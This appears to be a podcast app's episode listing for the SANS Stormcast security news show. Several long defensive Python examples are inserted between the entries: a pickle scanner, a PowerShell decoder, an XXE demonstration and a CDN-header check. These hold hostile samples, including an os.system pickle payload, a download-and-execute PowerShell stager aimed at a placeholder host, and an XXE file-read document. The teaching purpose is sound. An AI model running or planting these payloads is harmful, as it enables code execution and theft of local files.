Moon FM - The Ultimate Podcast App
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Johannes B. Ullrich
Daily update on current cyber security threats
6 minutes 56 seconds
SANS Stormcast Friday, December 12th, 2025: Local AI Models; Mystery Chrome 0-Day; SOAPwn Attack
Using AI Gemma 3 Locally with a Single CPU
Installing AI models on modest hardware is possible and can be useful for experimenting with these models on premises.
https://isc.sans.edu/diary/Using%20AI%20Gemma%203%20Locally%20with%20a%20Single%20CPU%20/32556
Mystery Google Chrome 0-Day Vulnerability
Google released an update for Google Chrome fixing a vulnerability that is already being exploited but has no CVE number assigned to it yet.
https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_10.html
SOAPwn: Pwning .NET Framework Applications Through HTTP Client Proxies And WSDL
watchTowr identified a common vulnerability in .NET SOAP implementations.
https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/
12 December 2025, 2:00 am
6 minutes 58 seconds
SANS Stormcast Thursday, December 11th, 2025: Possible CVE-2024-9042 variant; react2shell exploits; notepad++ update hijacking; macOS priv escalation
Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection)
We observed HTTP requests with our honeypot that may be indicative of a new version of an exploit against an older vulnerability. Help us figure out what is going on.
https://isc.sans.edu/diary/Possible%20exploit%20variant%20for%20CVE-2024-9042%20%28Kubernetes%20OS%20Command%20Injection%29/32554
React2Shell: Technical Deep-Dive & In-the-Wild Exploitation of CVE-2025-55182
Wiz has a writeup with more background on the React2Shell vulnerability and current attacks
https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-dive
Notepad++ Update Hijacking
Notepad++'s vulnerable update process was exploited.
https://notepad-plus-plus.org/news/v889-released/
New macOS PackageKit Privilege Escalation
A PoC was released for a new privilege escalation vulnerability in macOS. Currently, there is no patch.
https://khronokernel.com/macos/2024/06/03/CVE-2024-27822.html
11 December 2025, 1:48 am
8 minutes 4 seconds
SANS Stormcast Wednesday, December 10th, 2025: Microsoft, Adobe, Ivanti, Fortinet, and Ruby patches.
Microsoft Patch Tuesday
Microsoft released its regular monthly patch on Tuesday, addressing 57 flaws.
https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20December%202025/32550
Adobe Patches
Adobe patched five products. The remote code execution in ColdFusion, as well as the code execution issue in Acrobat, will very likely see exploits soon.
https://helpx.adobe.com/security.html
Ivanti Endpoint Manager Patches
Ivanti patched four vulnerabilities in Endpoint Manager.
https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024?language=en_US
Fortinet FortiCloud SSO Vulnerability
Due to a cryptographic vulnerability, Fortinet's FortiCloud SSO authentication can be bypassed.
https://fortiguard.fortinet.com/psirt/FG-IR-25-647
ruby-saml vulnerability
The ruby-saml maintainers fixed a vulnerability whose root cause is an incomplete patch for a vulnerability fixed a few months ago.
https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3
10 December 2025, 12:35 am
6 minutes 26 seconds
SANS Stormcast Tuesday, December 9th, 2025: nanoKVM Vulnerabilities; Ghostframe Phishing; WatchGuard Advisory
nanoKVM Vulnerabilities
The nanoKVM device updates firmware insecurely; however, the microphone that the authors of the advisory referred to as undocumented may actually be documented in the underlying hardware description.
https://www.tomshardware.com/tech-industry/cyber-security/researcher-finds-undocumented-microphone-and-major-security-flaws-in-sipeed-nanokvm
Ghostframe Phishing Kit
The Ghostframe phishing kit uses iframes and random subdomains to evade detection.
https://blog.barracuda.com/2025/12/04/threat-spotlight-ghostframe-phishing-kit
WatchGuard Advisory
WatchGuard released an update for its Firebox appliance, fixing ten vulnerabilities. Five of these are rated as High.
https://www.watchguard.com/wgrd-psirt/advisories
9 December 2025, 2:00 am
5 minutes 34 seconds
SANS Stormcast Monday, December 8th, 2025: AutoIT3 FileInstall; React2Shell Update; Tika Vuln
AutoIT3 Compiled Scripts Dropping Shellcodes
Malicious AutoIT3 scripts are using the FileInstall function to include additional files at compile time; these are dropped as temporary files during execution.
https://isc.sans.edu/diary/AutoIT3%20Compiled%20Scripts%20Dropping%20Shellcodes/32542
React2Shell Update
The race is on to patch vulnerable systems. Various groups are aggressively scanning the internet with different exploit variants. Some attempt to bypass WAFs.
https://blog.cloudflare.com/5-december-2025-outage/
https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
Apache Tika XXE Flaw
Apache's Tika library patched an XXE flaw.
https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
8 December 2025, 2:00 am
4 minutes 35 seconds
SANS Stormcast Friday, December 5th, 2025: Compromised Govt System; React Vuln Update; Array Networks VPN Attacks
Nation-State Attack or Compromised Government? [Guest Diary]
An IP address associated with the Indonesian Government attacked one of our interns' honeypots.
https://isc.sans.edu/diary/Nation-State%20Attack%20or%20Compromised%20Government%3F%20%5BGuest%20Diary%5D/32536
React Update
Working exploits for the React vulnerability patched yesterday are now widely available.
Array Networks Array AG Vulnerability
A recently patched vulnerability in Array Networks Array AG VPN gateways is actively exploited.
https://www.jpcert.or.jp/at/2025/at250024.html
5 December 2025, 2:05 am
6 minutes 44 seconds
SANS Stormcast Thursday, December 4th, 2025: CDN Headers; React Vulnerability; PickleScan Patch
Attempts to Bypass CDNs
Our honeypots recently started receiving scans that included CDN specific headers.
https://isc.sans.edu/diary/Attempts%20to%20Bypass%20CDNs/32532
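As an added illustration, not code from the ISC diary: a scan that reaches an origin server directly but carries the headers a CDN would normally add only works against an origin that trusts those headers unconditionally. The header names and CDN address ranges below are assumed placeholders (documentation address space, not any provider's real list). The snippet shows the naive client-IP logic beside a hardened version that checks the TCP peer first, plus a classifier for tagging such requests in logs.

```python
import ipaddress

# Constructed placeholders for the CDN's egress ranges (RFC 5737 / RFC 3849
# documentation space). A real origin loads the provider's published list.
TRUSTED_CDN_RANGES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8:c0de::/48"),
]

# Headers a CDN adds to convey the true client address. Names are assumed
# examples; check which ones your CDN actually sets.
CLIENT_IP_HEADERS = ("cf-connecting-ip", "true-client-ip", "x-forwarded-for")


def came_via_cdn(peer_ip):
    """True only if the TCP peer is one of the CDN's own addresses."""
    ip = ipaddress.ip_address(peer_ip)
    return any(ip in net for net in TRUSTED_CDN_RANGES)


def naive_client_ip(peer_ip, headers):
    """What a misconfigured origin does: believes the header from anyone.
    A scanner that reaches the origin directly then picks its own 'client IP',
    defeating header-based allowlists, geo rules and rate limits."""
    for name in CLIENT_IP_HEADERS:
        value = headers.get(name)
        if value:
            # X-Forwarded-For may be a chain; the left-most hop is attacker-set.
            return value.split(",")[0].strip()
    return peer_ip


def hardened_client_ip(peer_ip, headers):
    """Honour the CDN headers only when the request really arrived via the CDN;
    otherwise the peer address is the best available truth."""
    if not came_via_cdn(peer_ip):
        return peer_ip
    return naive_client_ip(peer_ip, headers)


def classify(peer_ip, headers):
    """Tag a request for logging: 'cdn', 'direct', or 'spoofed-cdn-headers'
    (CDN headers on a connection that did not come from the CDN, which is what
    the honeypot traffic described above looks like)."""
    if came_via_cdn(peer_ip):
        return "cdn"
    if any(name in headers for name in CLIENT_IP_HEADERS):
        return "spoofed-cdn-headers"
    return "direct"


# Constructed sample requests: (peer address, lower-cased header dict).
REQUESTS = {
    "via_cdn": ("203.0.113.10", {"cf-connecting-ip": "198.51.100.7"}),
    "scan_with_fake_headers": ("192.0.2.55", {
        "cf-connecting-ip": "127.0.0.1",
        "x-forwarded-for": "127.0.0.1, 203.0.113.10",
    }),
    "plain_direct": ("192.0.2.56", {}),
}

if __name__ == "__main__":
    for label, (peer, hdrs) in REQUESTS.items():
        print(label, classify(peer, hdrs),
              "naive:", naive_client_ip(peer, hdrs),
              "hardened:", hardened_client_ip(peer, hdrs))
```

The "spoofed-cdn-headers" tag is the useful signal for a honeypot or origin log: a client that knows your CDN's header names but never passed through the CDN is probing whether the origin is reachable and trusts them. The real fix is to make the origin reachable only from the CDN (firewall or mutual TLS), with this header check as defence in depth.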
React Vulnerability CVE-2025-55182
React patched a critical vulnerability in React server components. Exploitation is likely imminent.
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Unveiling 3 PickleScan Vulnerabilities
PickleScan, a scanner for the Python pickle files that many machine-learning models (PyTorch checkpoints included) are distributed in, patched three critical vulnerabilities reported by JFrog.
https://jfrog.com/blog/unveiling-3-zero-day-vulnerabilities-in-picklescan/
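Added example, not PickleScan's own code: what a pickle scanner does at its core. It walks the opcode stream with pickletools instead of unpickling, lists every global the file would import and counts the opcodes that call something at load time, then judges the imports against an allowlist (the allowlist below is a hypothetical stand-in). The malicious sample is constructed locally and is only serialised, never loaded.

```python
import collections
import os
import pickle
import pickletools

# Hypothetical allowlist of globals a model checkpoint may import. Real tools
# ship much longer lists; the point is that unknown imports are rejected
# rather than only known-bad ones being denied.
SAFE_GLOBALS = {
    "collections.OrderedDict",
    "torch._utils._rebuild_tensor_v2",
    "torch.FloatStorage",
}

STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                  "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that invoke a callable or __setstate__ during unpickling.
CALL_OPCODES = {"REDUCE", "BUILD", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def scan_pickle(data):
    """Statically walk the opcode stream (never pickle.loads) and report
    every global that would be imported plus the number of call opcodes."""
    globals_seen, calls = [], 0
    pushes, memo = [], {}   # just enough stack/memo tracking for STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in STRING_OPCODES:
            pushes.append(arg)
        elif name == "MEMOIZE":                     # memo index = running count
            memo[len(memo)] = pushes[-1] if pushes else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = pushes[-1] if pushes else None
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            pushes.append(memo.get(arg))
        elif name in ("GLOBAL", "INST"):            # protocol <= 3: "module name"
            mod, attr = arg.split(" ", 1)
            globals_seen.append(f"{mod}.{attr}")
            if name == "INST":                      # INST also constructs
                calls += 1
        elif name == "STACK_GLOBAL":                # protocol 4+: two strings on stack
            mod, attr = pushes[-2], pushes[-1]
            globals_seen.append(f"{mod}.{attr}")
        elif name in CALL_OPCODES:
            calls += 1
    disallowed = sorted(set(globals_seen) - SAFE_GLOBALS)
    return {
        "globals": globals_seen,
        "calls": calls,
        "disallowed": disallowed,
        "verdict": "clean" if not disallowed else "suspicious",
    }


class _Payload:
    """Constructed malicious object: unpickling it would run os.system()."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


# Constructed inputs; pickle.dumps only serialises, it never runs the payload.
BENIGN = pickle.dumps({"weights": [0.1, 0.2], "name": "tiny"}, protocol=4)
ORDERED = pickle.dumps(collections.OrderedDict([("layer", 1)]), protocol=4)
MALICIOUS_P4 = pickle.dumps(_Payload(), protocol=4)   # emits STACK_GLOBAL
MALICIOUS_P2 = pickle.dumps(_Payload(), protocol=2)   # emits GLOBAL

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("ordered", ORDERED),
                        ("malicious p4", MALICIOUS_P4), ("malicious p2", MALICIOUS_P2)]:
        print(label, scan_pickle(blob))
```

Scanners of this kind fail in two ways: the scanner's parser disagrees with the real unpickler about where the stream ends or how an opcode is encoded, or the policy is a denylist that a new import path sidesteps. The allowlist approach above handles the second; the first is why a scanner must track every protocol's encoding of a global (both GLOBAL and STACK_GLOBAL here) rather than grep for module names.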
4 December 2025, 3:10 am
6 minutes 6 seconds
SANS Stormcast Wednesday, December 3rd, 2025: SmartTube Compromise; NPM Malware Prompt Injection Attempt; Angular XSS Vulnerability
SmartTube Android App Compromise
The key a developer used to sign the Android YouTube player SmartTube was compromised and used to publish a malicious version.
https://github.com/yuliskov/SmartTube/issues/5131#issue-3670629826
https://github.com/yuliskov/SmartTube/releases/tag/notification
Two Years, 17K Downloads: The NPM Malware That Tried to Gaslight Security Scanners
Over the course of two years, a malicious NPM package was updated to evade detection and has now been identified, in part, due to its attempt to bypass AI scanners through prompt injection.
https://www.koi.ai/blog/two-years-17k-downloads-the-npm-malware-that-tried-to-gaslight-security-scanners
Stored XSS Vulnerability via SVG Animation, SVG URL, and MathML Attributes
Angular fixed a stored XSS vulnerability.
https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49
3 December 2025, 2:45 am
5 minutes 49 seconds
SANS Stormcast Tuesday, December 2nd, 2025: Analyzing ToolShell from Packets; Android Update; Long Game Malicious Browser Ext.
Hunting for SharePoint In-Memory ToolShell Payloads
A walk-through showing how to analyze ToolShell payloads, starting with acquiring packets all the way to decoding embedded PowerShell commands.
https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Hunting%20for%20SharePoint%20In-Memory%20ToolShell%20Payloads/32524
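Added example, not code from the guest diary: the last step of that walk-through, pulling -EncodedCommand arguments out of captured request text and decoding them (base64 over UTF-16LE), with recursion for loaders that launch a second encoded stage. The samples are constructed; the URL-decoding pass assumes the capture came out of an HTTP request body.

```python
import base64
import re
import urllib.parse

# PowerShell's switch for a base64(UTF-16LE) command. PowerShell also accepts
# other unambiguous prefixes of -EncodedCommand; extend the alternation as needed.
ENC_SWITCH = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_commands(text, depth=3):
    """Return the plaintext of every -EncodedCommand argument found in text,
    recursing into decoded commands that themselves carry an encoded stage.
    The input is URL-decoded first (assumption: it was lifted from an HTTP
    request body, where '+' and '=' arrive percent-encoded)."""
    text = urllib.parse.unquote(text)
    found = []
    for match in ENC_SWITCH.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            cmd = raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue   # not a real payload (e.g. junk that looked like base64)
        found.append(cmd)
        if depth > 0:
            found.extend(decode_encoded_commands(cmd, depth - 1))
    return found


def _encode(cmd):
    """Build a sample the way a loader would (constructed input)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed samples; the inner command is harmless and points at a reserved TLD.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
STAGE1 = "powershell.exe -NoP -W Hidden -enc " + _encode(STAGE2)
CAPTURED = "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + _encode(STAGE1)
CAPTURED_URLENCODED = "cmd=" + urllib.parse.quote(CAPTURED)

if __name__ == "__main__":
    for stage, cmd in enumerate(decode_encoded_commands(CAPTURED_URLENCODED), 1):
        print(f"stage {stage}: {cmd}")
```

Two details matter in practice: the decoded bytes are UTF-16LE, so a plain base64 decode shows every other byte as NUL and hides the command from naive string matching, and "-ExecutionPolicy Bypass" must not be mistaken for "-e"; the regex above requires the switch to be followed by whitespace, and the decode step throws away anything that is not valid base64 of even length.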
Android Security Bulletin December 2025
Google fixed numerous vulnerabilities with its December Android update. Two of these vulnerabilities are already being exploited.
https://source.android.com/docs/security/bulletin/2025-12-01
4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign
A group or individual published several browser extensions that behaved benignly for years until an update injected malicious code into them.
https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
2 December 2025, 2:05 am
5 minutes 42 seconds
SANS Stormcast Monday, December 1st, 2025: More ClickFix; Teams Guest Access; Geoserver XXE Vulnerablity
Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix
The latest ClickFix variant tricks users into copying and pasting commands by displaying a fake full-screen Windows Update screen.
https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/
B2B Guest Access Creates an Unprotected Attack Vector
Users may be tricked into joining an external Teams workspace as a guest, bypassing protections typically enabled for Teams workspaces.
https://www.ontinue.com/resource/blog-microsoft-chat-with-anyone-understanding-phishing-risk/
Geoserver XXE Vulnerability CVE-2025-58360
Geoserver patched an XML external entity (XXE) vulnerability.
https://helixguard.ai/blog/CVE-2025-58360
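Both this Geoserver item and the Apache Tika item earlier in the feed are XML external entity bugs. As an added example (using Python's xml.sax rather than the Java parsers those projects use, and not code from either project), here is the bug class side by side: a parser configured to resolve external general entities copies a local file into the document, Python's default configuration skips the entity, and a stricter variant refuses DTDs altogether. The "secret" file is constructed in a temporary location.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Gathers the character data the parser hands back for <doc>."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def xxe_document(target_path):
    """Classic XXE: an external general entity whose replacement text is a
    local file, referenced inside an element the application echoes back."""
    uri = pathlib.Path(target_path).resolve().as_uri()
    return ('<?xml version="1.0"?>\n'
            f'<!DOCTYPE doc [ <!ENTITY xxe SYSTEM "{uri}"> ]>\n'
            '<doc>&xxe;</doc>').encode()


def parse_external_entities_enabled(data):
    """The XXE-prone configuration: external general entities are fetched."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return collector.text()


def parse_external_entities_disabled(data):
    """Python's default since 3.7.1: the entity reference is skipped."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return collector.text()


def parse_no_dtd(data):
    """Stricter still: refuse documents carrying a DTD at all, which also
    closes internal-entity tricks such as expansion bombs. This crude byte
    check plays the role of the disallow-doctype-decl feature on Java/Xerces."""
    if b"<!DOCTYPE" in data:
        raise ValueError("DTD not allowed")
    return parse_external_entities_disabled(data)


def demo():
    """Constructed secret file run through the three parser configurations."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    secret = "s3cr3t-api-key"
    with os.fdopen(fd, "w") as f:
        f.write(secret)
    try:
        doc = xxe_document(path)
        try:
            parse_no_dtd(doc)
            strict_rejected = False
        except ValueError:
            strict_rejected = True
        return {
            "secret": secret,
            "vulnerable": parse_external_entities_enabled(doc),
            "default": parse_external_entities_disabled(doc),
            "strict_rejected": strict_rejected,
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

The same entity can point at http:// URLs, which turns the bug into server-side request forgery even when the file contents never reach the response. Whatever the library, the check to make is which of external general entities, external parameter entities and DTD processing are enabled by default, and to turn all three off when the XML comes from an untrusted client.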
1 December 2025, 2:00 am
6 minutes 7 seconds
SANS Stormcast Wednesday, November 26th, 2025: Attacks Against Messaging; Passwords in Random Websites; Fluentbit Vuln; #thanksgiving
Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications
Spyware attacks messaging applications in part by triggering vulnerabilities in messaging applications but also by deploying tools like keystroke loggers and screenshot applications.
https://www.cisa.gov/news-events/alerts/2025/11/24/spyware-allows-cyber-threat-actors-target-users-messaging-applications
Stop Putting Your Passwords Into Random Websites. Yes. Just Stop!
https://labs.watchtowr.com/stop-putting-your-passwords-into-random-websites-yes-seriously-you-are-the-problem/
Fluentbit Vulnerability
https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover
Happy Thanksgiving. Next podcast on Monday after Thanksgiving.
26 November 2025, 3:10 am